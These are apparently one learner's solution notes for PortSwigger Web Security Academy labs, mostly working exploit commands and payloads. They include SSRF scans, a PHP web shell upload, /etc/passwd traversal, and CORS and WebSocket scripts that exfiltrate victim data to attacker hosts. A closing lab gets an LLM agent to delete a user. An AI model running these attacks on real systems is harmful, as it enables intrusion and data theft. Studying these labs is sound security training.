  1. Following password reset email should be sent by the backend to the victim: https://attacker.controlled.domain.net//forgot-password?temp-forgot-password-token=[token].
  2. Hope that the victim will click the received password reset link.
  3. Monitor https://attacker.controlled.domain.net for password reset requests with victim's token.
  4. Set new password for the victim and takeover his account:
POST /forgot-password?temp-forgot-password-token=[token] HTTP/1.1
Host: ac2e1f791f60b475c03512ca00550093.web-security-academy.net
...

csrf=joLaw8RAzKsT6UqhT6X5D2MzlfRk6avZ&temp-forgot-password-token=[token]&new-password-1=[newPassword]&new-password-2=[newPassword]

Mitigation

Do not rely on user's provided Host header when constructing reset link. Maintain whitelist of Host header value that could be used.

Lab: Routing-based SSRF

Target

https://portswigger.net/web-security/host-header/exploiting/lab-host-header-routing-based-ssrf

Discovery

for i in $(seq 1 254); do echo; echo -n "HTTP code (192.168.0.$i): "; curl -s -o /dev/null -w "%{http_code}" -k -x 127.0.0.1:8080 -H "Host:192.168.0.$i" https://accb1f781f591110c0ef0e84001c00c1.web-security-academy.net/; done

Analysis

Exploitation

Get CSRF token:

curl -s -L -k -x 127.0.0.1:8080 -H "Host:192.168.0.146" https://accb1f781f591110c0ef0e84001c00c1.web-security-academy.net/ | grep csrf | cut -d'"' -f6

Delete user:

curl -L -k -x 127.0.0.1:8080 -H "Host:192.168.0.146" https://accb1f781f591110c0ef0e84001c00c1.web-security-academy.net/admin/delete -d "username=carlos&csrf=3opFh3G3pX6WfecTEeIMMWS5rXVJHlja"

Mitigation

Conduct proper (whitelisting) validation of Host header.

Lab: SSRF via flawed request parsing

Target

https://portswigger.net/web-security/host-header/exploiting/lab-host-header-ssrf-via-flawed-request-parsing

Discovery

curl --request-target "admin" --cookie '_lab=<_LAB_COOKIE>' -H "Host:d1f0j2osh1vbpmver478a51mwd23qs.burpcollaborator.net" -k -x 127.0.0.1:8080 -L https://ac561f811e00c696c030a39300a100a6.web-security-academy.net/

Which sends following request (note the lack of leading slash in request line):

GET admin HTTP/1.1
Host: d1f0j2osh1vbpmver478a51mwd23qs.burpcollaborator.net
Cookie: _lab=<_LAB_COOKIE>
User-Agent: curl/7.77.0
Accept: */*
Connection: close

Analysis

Exploitation

Finding internal IP of machine with admin panel:

for i in $(seq 1 254); do echo; echo -n "HTTP code (192.168.0.$i): "; curl --request-target "admin" --cookie '_lab=<_LAB_COOKIE>' -s -o /dev/null -w "%{http_code}" -k -x 127.0.0.1:8080 -H "Host:192.168.0.$i" https://ac561f811e00c696c030a39300a100a6.web-security-academy.net; done

Getting CSRF token:

curl -s --request-target "admin" --cookie '_lab=<_LAB_COOKIE>' -H "Host:192.168.0.99" -k -x 127.0.0.1:8080 -L https://ac561f811e00c696c030a39300a100a6.web-security-academy.net/ | grep csrf | cut -d'"' -f6

Deleting user:

curl -s --request-target 'admin/delete' --cookie '_lab=<_LAB_COOKIE>' -H "Host:192.168.0.99" -k -x 127.0.0.1:8080 -L https://ac561f811e00c696c030a39300a100a6.web-security-academy.net -d "username=carlos&csrf=BPr4IhyXjFpaBg94UtflJbU1l8XYJlTh"

Mitigation

Lab: Password reset poisoning via dangling markup

Target

https://portswigger.net/web-security/host-header/exploiting/password-reset-poisoning/lab-host-header-password-reset-poisoning-via-dangling-markup

Vulnerability

The application contains password reset scheme where new password is sent to user's mailbox (which as a side note is not a good idea). Similar as previously content of the email is dynamically generated by the application using provided Host header. However at this time it seems that its value can't be modified.

We also know (from the hint) that an email content is processed by an antivirus solution of some kind and links are inspected (visited).

After some probing it could be observed that we can't use other value of Host header but we can append arbitrary text string to it after : sign:

ac1c1f2f1f580ce7c0db53ed00e00045.web-security-academy.net:[arbitrary-string]

We can also observe that this appended string will be present in a password's reset email content:

<p>Hello!</p><p>Please <a href='https://ac1c1f2f1f580ce7c0db53ed00e00045.web-security-academy.net:[arbitrary-string]

Exploitation

To exploit this behaviour we inject dangling markup img to the email content that triggers a request to an attacker controlled machine leaking content of the email and revealing newly set password to the attacker:

Payload:

POST /forgot-password HTTP/1.1
Host: ac1c1f2f1f580ce7c0db53ed00e00045.web-security-academy.net:<img src="https://exploit-ac621fec1f750cddc0b653190149007d.web-security-academy.net HTTP/1.1
...

csrf=Muy5ijvBGdZBDK7Wc1UhEesdOGnXYVCs&username=carlos

Revealed password:

"GET /login'>click+here</a>+to+login+with+your+new+password:+N17bJQ1zbj</p><p>Thanks,<br/>Support+team</p><i>This+email+has+been+scanned+by+the+MacCarthy+Email+Security+service</i> HTTP/1.1" 404

Mitigation

Do not rely on user's provided Host header when constructing reset email content. Maintain whitelist of Host header value that could be used.

Lab: Host header authentication bypass

Target

https://portswigger.net/web-security/host-header/exploiting/lab-host-header-authentication-bypass

Vulnerability

By spoofing Host header we can impersonate as a localhost and get an access to admin panel.

Exploitation

Exploit:

cat > labSolution-Host-header-authentication-bypass.sh <<'EOF'
#!/bin/bash

URL=https://ac351fd21e01d489c0ef40ee002700d4.web-security-academy.net
PROXY=127.0.0.1:8080

# get a value of '_lab' cookie:
COOKIE=$(curl -s -k -c - $URL | grep lab | cut -f7)

# delete carlos:
curl -H "Host:localhost" -b "_lab=$COOKIE" -k -x $PROXY $URL/admin/delete?username=carlos

EOF

Mitigation

Do not rely solely on Host header as an authentication factor, in addition implement at least IP-based access control.

Lab: Web cache poisoning via ambiguous requests

Target

https://portswigger.net/web-security/host-header/exploiting/lab-host-header-web-cache-poisoning-via-ambiguous-requests

Discovery

Analysis

Exploitation

Mitigation

SSRF

Lab: Basic SSRF against the local server

Target

https://portswigger.net/web-security/ssrf/lab-basic-ssrf-against-localhost

Exploitation

curl -s --cookie 'session=ad5aRkfuRv4ilMJfz3tVjYdDmA2103LA' -k -x 127.0.0.1:8080 -L https://ac651f3c1e02b956c01827ce004b0054.web-security-academy.net/product/stock -d "stockApi=http://localhost/admin/delete?username=carlos"

Mitigation

Lab: Basic SSRF against another back-end system

Target

https://portswigger.net/web-security/ssrf/lab-basic-ssrf-against-backend-system

Discovery

for i in $(seq 1 254); do echo; echo -n "HTTP code (192.168.0.$i): "; curl -s -o /dev/null -w "%{http_code}" --cookie 'session=5N9l2T48cjM2v8hcBUt3nXR7rbIn0s4C' -k -x 127.0.0.1:8080 -L https://acf61f111effb787c06c89ab00fb00f1.web-security-academy.net/product/stock -d "stockApi=http://192.168.0.$i:8080/admin"; done

Exploitation

curl -s --cookie 'session=5N9l2T48cjM2v8hcBUt3nXR7rbIn0s4C' -k -x 127.0.0.1:8080 -L https://acf61f111effb787c06c89ab00fb00f1.web-security-academy.net/product/stock -d "stockApi=http://192.168.0.242:8080/admin/delete?username=carlos"

Mitigation

Lab: SSRF with blacklist-based input filter

https://portswigger.net/web-security/ssrf/lab-ssrf-with-blacklist-filter

Payload:

LoCaLhOSt/aDmIn/delete?username=carlos

Lab: SSRF with filter bypass via open redirection vulnerability

https://portswigger.net/web-security/ssrf/lab-ssrf-filter-bypass-via-open-redirection

Solution: taking advantage of open-redirect in the app.

stockApi=/product/nextProduct%3fcurrentProductId%3d19%26path%3dhttp%3a//192.168.0.12%3a8080/admin/delete%3fusername%3dcarlos

Lab: Blind SSRF with out-of-band detection

https://portswigger.net/web-security/ssrf/blind/lab-out-of-band-detection

Solution: manipulation of Referer header.

Referer: https://cfvmob36g2wyztoyn5de47ajxa31rrfg.oastify.com

Lab: SSRF with whitelist-based input filter

https://portswigger.net/web-security/ssrf/lab-ssrf-with-whitelist-filter

Lab: Blind SSRF with Shellshock exploitation

https://portswigger.net/web-security/ssrf/blind/lab-shellshock-exploitation

CORS

Lab: CORS vulnerability with basic origin reflection

https://portswigger.net/web-security/cors/lab-basic-origin-reflection-attack

Solution:

Prepare malicious site at https://exploit-aca61f101e0cd2bbc0651ef401560071.web-security-academy.net/exploit with following content:

<body>
<script>
var req = new XMLHttpRequest();
req.onload = reqListener;
req.open('get','https://ac261f591e78d235c08f1e24008500d0.web-security-academy.net/accountDetails',true);
req.withCredentials = true;
req.send();

function reqListener() {
   location='//exploit-aca61f101e0cd2bbc0651ef401560071.web-security-academy.net/RESPONSE='+this.responseText;
}
</script>
</body>

Entice a victim to visit the site.

Lab: CORS vulnerability with trusted null origin

https://portswigger.net/web-security/cors/lab-null-origin-whitelisted-attack

Solution:

<iframe sandbox="allow-scripts allow-top-navigation allow-forms" src="data:text/html,<script>
var req = new XMLHttpRequest();
req.onload = reqListener;
req.open('get','https://ac6b1fca1ed6a388c0134d600014004e.web-security-academy.net/accountDetails',true);
req.withCredentials = true;
req.send();

function reqListener() {
location='https://exploit-aca01f401ecfa3bec0144d20010e005b.web-security-academy.net/RESPONSE='+this.responseText;
};
</script>"></iframe>

Entice a victim to visit the site.

OS command injection

Lab: OS command injection, simple case

https://portswigger.net/web-security/os-command-injection/lab-simple

Solution:

curl -s https://ac6d1f651f877b62c0b55c6900bf0003.web-security-academy.net/product/stock -d 'productId=4;&storeId=whoami'

Directory traversal

Lab: File path traversal, simple case

https://portswigger.net/web-security/file-path-traversal/lab-simple

Solution:

curl -s https://ac6e1f941f6b5fc4c0268759008a0086.web-security-academy.net/image?filename=../../../etc/passwd

Lab: File path traversal, validation of file extension with null byte bypass

https://portswigger.net/web-security/file-path-traversal/lab-validate-file-extension-null-byte-bypass

Solution:

curl -s https://acca1fb61f2f6549c01b7fe40084009d.web-security-academy.net/image?filename=../../../etc/passwd%00.jpg

Insecure deserialization

Lab: Modifying serialized objects

https://portswigger.net/web-security/deserialization/exploiting/lab-deserialization-modifying-serialized-objects

Solution:

curl -L -k -x 127.0.0.1:8080 --cookie session="$(rawurlencode "$(echo -n 'O:4:"User":2:{s:8:"username";s:13:"administrator";s:5:"admin";b:1;}' |base64 -w 0)")" -s https://acb81f701e4368eac086a2d100ff0039.web-security-academy.net/admin/delete?username=carlos

File upload vulnerabilities

Lab: Remote code execution via web shell upload

https://portswigger.net/web-security/file-upload/lab-file-upload-remote-code-execution-via-web-shell-upload

Solution:

# file upload:
curl --cookie 'session=dyqaoIriO5ZVrUFaVPkJzQUzO4owEwQG' -s https://acdb1f251fb9fcc8c0b20af000e500ae.web-security-academy.net/my-account/avatar -F "filename=s.php" -F "avatar='<?php system(\"cat /home/carlos/secret\") ?>';filename=s.php" -F "csrf=WjAuaitTZfPMr38U0DT3VY3cGA0ActDq" -F "user=wiener"
# file execution:
curl https://acdb1f251fb9fcc8c0b20af000e500ae.web-security-academy.net/files/avatars/s.php

Lab: Web shell upload via Content-Type restriction bypass

https://portswigger.net/web-security/file-upload/lab-file-upload-web-shell-upload-via-content-type-restriction-bypass

Solution (as previously but explicitly spoof Content-Type):

curl --cookie 'session=tGHaK4JFRKUYlLN6LiAJi0kyAr3uPPpy' -s https://ac2b1f8e1e792d53c084231a00e50037.web-security-academy.net/my-account |grep csrf

curl --cookie 'session=tGHaK4JFRKUYlLN6LiAJi0kyAr3uPPpy' -s https://ac2b1f8e1e792d53c084231a00e50037.web-security-academy.net/my-account/avatar -F "filename=s.php" -F "avatar='<?php system(\"cat /home/carlos/secret\") ?>';filename=s.php;type=image/png" -F "csrf=bwZwpzDsnnWqkQwAj3vqLuvTEDN06VDx" -F "user=wiener"

curl --cookie 'session=tGHaK4JFRKUYlLN6LiAJi0kyAr3uPPpy' -s https://ac2b1f8e1e792d53c084231a00e50037.web-security-academy.net/files/avatars/s.php

Business logic vulnerabilities

Lab: Excessive trust in client-side controls

https://portswigger.net/web-security/logic-flaws/examples/lab-logic-flaws-excessive-trust-in-client-side-controls

Solution steps:

  1. Log in
  2. Intercept 'Add to cart' request and change its price parameter
  3. Buy product for chosen price

Lab: High-level logic vulnerability

https://portswigger.net/web-security/logic-flaws/examples/lab-logic-flaws-high-level

Solution:

  1. Log in
  2. Observe that in POST /cart request parameter quantity support negative numbers. Therefore total price could be negative
  3. Taking advantage of (2) put to cart -60 of 2nd product then add first product to the cart
  4. Total price will be counted: price of the frst prduct + -60 * price of the 2nd product so it will be less then number of your credits

Lab: Inconsistent security controls

https://portswigger.net/web-security/logic-flaws/examples/lab-logic-flaws-inconsistent-security-controls

Solution steps:

  1. Register as a administrator user providing your attacker's email
  2. Active account using received activation link
  3. Log in
  4. Change your email to '[email protected]`
  5. Access admin panel and delete 'carlos' user

Lab: Flawed enforcement of business rules

https://portswigger.net/web-security/logic-flaws/examples/lab-logic-flaws-flawed-enforcement-of-business-rules

Solution:

  1. Signup for the newsletter with POST /sign-up, new promo code will be received.
  2. Add promo codes alternately till the product will be affordable

WebSockets

Lab: Manipulating WebSocket messages to exploit vulnerabilities

https://portswigger.net/web-security/websockets/lab-manipulating-messages-to-exploit-vulnerabilities

Payload: <img src=1 onerror='alert(1)'/>

Solution (3rd party tool used: https://github.com/vi/websocat):

echo -n "{\"message\":\"<img src=1 onerror='alert(1)'/>\"}" | websocat --text -v - wss://acc21f591f207752c010be23002b006e.web-security-academy.net/chat

Lab: Cross-site WebSocket hijacking

This is basically CSRF over websocket connection. Victim is tricked to visit malicious website which performs websocket handshake on behalf of the victim and then gets access to victim's data (chat history).

Solution:

<script>
    var ws = new WebSocket('wss://0a980078030a90998cafb73000ca00c4.web-security-academy.net/chat');
    ws.onopen = function() {
        ws.send("READY");
    };
    ws.onmessage = function(event) {
        fetch('https://m2pxjb5rp8flu7rxbrz3226he8kz8pwe.oastify.com', {method: 'POST', mode: 'no-cors', body: event.data});
    };
</script>

Mitigation:

As with standard CSRF, anit CSRF tokens needs to be used to prevent an attacker from forging websocket handshake on behalf of the victim.

Lab: Manipulating the WebSocket handshake to exploit vulnerabilities

https://portswigger.net/web-security/websockets/lab-manipulating-handshake-to-exploit-vulnerabilities

Authentication

Lab: Username enumeration via different responses

https://portswigger.net/web-security/authentication/password-based/lab-username-enumeration-via-different-responses

Solution:

ffuf -t 10 -x http://127.0.0.1:8080 -X POST -H 'session:S1mBZqhhKbWEuSF9zb9hwAm0YMhcz7T3' -w users.txt -u https://0adb00360441e61fc0fe135e00bc003a.web-security-academy.net/login -d "username=FUZZ&password=xyz" -fr 'Invalid'

ffuf -t 10 -x http://127.0.0.1:8080 -X POST -H 'session:S1mBZqhhKbWEuSF9zb9hwAm0YMhcz7T3' -w passwd.txt -u https://0adb00360441e61fc0fe135e00bc003a.web-security-academy.net/login -d "username=applications&password=FUZZ" -fr 'Incorrect'

curl -L -H 'session:S1mBZqhhKbWEuSF9zb9hwAm0YMhcz7T3' 'https://0adb00360441e61fc0fe135e00bc003a.web-security-academy.net/login' -d "username=applications&password=pepper"

Lab: 2FA simple bypass

https://portswigger.net/web-security/authentication/multi-factor/lab-2fa-simple-bypass

Solution:

1. Provide carlos credentials
2. Modify redirect: instead of `/login2` go directly to `/my-account`

Lab: Password reset broken logic

https://portswigger.net/web-security/authentication/other-mechanisms/lab-password-reset-broken-logic

Solution:

# request reset password link for wiener:
curl https://0a0c0010038cef70c08939bb006600a1.web-security-academy.net/forgot-password -d "username=wiener"

# set new password for carlos:
curl -L -k -x 127.0.0.1:8080 --cookie 'session=jhDhbpkpWYLfS9HVTLGS6pDBh6PydHYo' https://0a0c0010038cef70c08939bb006600a1.web-security-academy.net/forgot-password?temp-forgot-password-token=W7J5AbLFD67g5Zrie4vKE9DiyVLUhrnH -d 'temp-forgot-password-token=6KksLbqie6NBvAVcyCPmJr9Qrxskgxzr
&username=carlos&new-password-1=abc&new-password-2=abc'

Clickjacking

Lab: Basic clickjacking with CSRF token protection

https://portswigger.net/web-security/clickjacking/lab-basic-csrf-protected

Solution:

<style>
    iframe {
        position:relative;
        width:500px;
        height: 700px;
        opacity: 0.0001;
        z-index: 2;
    }
    div {
        position:absolute;
        top:495px;
        left:70px;
        z-index: 1;
    }
</style>
<div>click me</div>
<iframe src="https://0a3a00b004f0a545823629f2002c003e.web-security-academy.net/my-account"></iframe>

Lab: Clickjacking with form input data prefilled from a URL parameter

https://portswigger.net/web-security/clickjacking/lab-prefilled-form-input

Solution:

<style>
    iframe {
        position:relative;
        width:500px;
        height: 700px;
        opacity: 0.1;
        z-index: 2;
    }
    div {
        position:absolute;
        top:450px;
        left:70px;
        z-index: 1;
    }
</style>
<div>click me</div>
<iframe src="https://0a0a007a0426b22481bb0cc7009d00b3.web-security-academy.net/[email protected]"></iframe>

Lab: Clickjacking with a frame buster script

https://portswigger.net/web-security/clickjacking/lab-frame-buster-script

Solution:

<style>
    iframe {
        position:relative;
        width:500px;
        height: 700px;
        opacity: 0.1;
        z-index: 2;
    }
    div {
        position:absolute;
        top:530px;
        left:75px;
        z-index: 1;
    }
</style>
<div>click me</div>
<iframe src="https://0ac600f403d0b36d80cc49c800fd00de.web-security-academy.net/[email protected]" sandbox="allow-forms"></iframe>

Lab: Exploiting clickjacking vulnerability to trigger DOM-based XSS

https://portswigger.net/web-security/clickjacking/lab-exploiting-to-trigger-dom-based-xss

Solution:

<style>
    iframe {
        position:relative;
        width:500px;
        height: 1000px;
        opacity: 0.1;
        z-index: 2;
    }
    div {
        position:absolute;
        top:790px;
        left:70px;
        z-index: 1;
    }
</style>
<div>click me</div>
<iframe src="https://0a7400270324b4218066b7f500d20071.web-security-academy.net/feedback?name=%3Cimg%20src=1%20onerror=%27print()%27/%3E&[email protected]&subject=abc&message=xyz"></iframe>

Lab: Multistep clickjacking

https://portswigger.net/web-security/clickjacking/lab-multistep

Solution:

<style>
    .frame1 {
        position:relative;
        width:500px;
        height: 700px;
        opacity: 0.1;
        z-index: 2;
    }
    .click1 {
        position:absolute;
        top:495px;
        left:70px;
        z-index: 1;
    }

    .click2 {
        position:absolute;
        top:300px;
        left:200px;
        z-index: 1;
    }
</style>
<div class="click1">Click me first</div>
<div class="click2">Click me next</div>
<iframe class="frame1" src="https://0a15001c0368c65d8033e933004e0061.web-security-academy.net/my-account"></iframe>

JWT

Lab: JWT authentication bypass via unverified signature

Target

https://portswigger.net/web-security/jwt/lab-jwt-authentication-bypass-via-unverified-signature

Discovery

Modify sub field in JWT's payload. Request GET /my-account. Observe that your username has changed.

Exploitation

Modify sub field in JWT's payload to administrator. Request GET /admin/delete?username=carlos.

Mitigation

Verify JWT signature on the backend and reject all requests with invalid signature.

Lab: JWT authentication bypass via flawed signature verification

Target

https://portswigger.net/web-security/jwt/lab-jwt-authentication-bypass-via-flawed-signature-verification

Discovery

Modify alg field in JWT's payload to null. Request GET /my-account. Observe that your request was accepted.

Exploitation

Modify sub field in JWT's payload to administrator. Modify alg field in JWT's payload to null. Request GET /admin/delete?username=carlos.

Mitigation

Require JWT signature on the backend and reject requests with null signature.

Essential skills

Lab: Discovering vulnerabilities quickly with targeted scanning

Payload:

<foo xmlns:xi="http://www.w3.org/2001/XInclude"><xi:include parse="text" href="file:///etc/passwd"/></foo>

Raw request:

POST /product/stock HTTP/1.1
[...]
Connection: close

productId=<foo+xmlns%3axi%3d"http%3a//www.w3.org/2001/XInclude"><xi%3ainclude+parse%3d"text"+href%3d"file%3a///etc/passwd"/></foo>&storeId=2

Race conditions

Lab: Limit overrun race conditions

https://portswigger.net/web-security/race-conditions/lab-race-conditions-limit-overrun

Solution:

Apply promo code multiple times sending 15 or so requests in paralell:

POST /cart/coupon HTTP/2
...
csrf=<CSRF_TOKEN>&coupon=PROMO20

GraphQL API vulnerabilities

Lab: Accessing private GraphQL posts

https://portswigger.net/web-security/graphql/lab-graphql-reading-private-posts

Solution:

  1. Notice that getAllPosts GraphQL command fetches sequential blog posts IDs without id=3
  2. Use InQL extension to modify query to get blog post with id=3 - but no password there
  3. Scan with Burp Scanner grapQL endpoint /graphql/v1 notice in schema that BlogPost command has postPassword field
  4. Use InQL extension to modify query to get blog post with id=3 and add postPassword field to the query

API testing

Lab: Exploiting an API endpoint using documentation

https://portswigger.net/web-security/api-testing/lab-exploiting-api-endpoint-using-documentation

Solution:

  1. Log in with provided creds
  2. visit API docs at /api/openapi.json and look for the way to delete user
  3. Delete user:
cat> r.hurl <<EOF
DELETE https://0aae00c9035d10ac82f4061600520093.web-security-academy.net/api/user/wiener
Cookie: session=LIa7duJhJjvnCe7uqczKBftChwe65RQJ
HTTP/2 200
EOF

hurl -k -x 127.0.0.1:8080 r.hurl --output -

NoSQL

Lab: Detecting NoSQL injection

https://portswigger.net/web-security/nosql-injection/lab-nosql-injection-detection

Solution:

/filter?category='||1||'

Lab: Exploiting NoSQL operator injection to bypass authentication

https://portswigger.net/web-security/nosql-injection/lab-nosql-injection-bypass-authentication

Solution:

{"username":{"$regex":"admin.*"},"password":{"$ne":""}}

Web LLM attacks

Lab: Exploiting LLM APIs with excessive agency

https://portswigger.net/web-security/llm-attacks/lab-exploiting-llm-apis-with-excessive-agency

Solution:

Go to: https://0ab9003504eb476384a87565007c0045.web-security-academy.net/chat

Send: I would like to delete user named carlos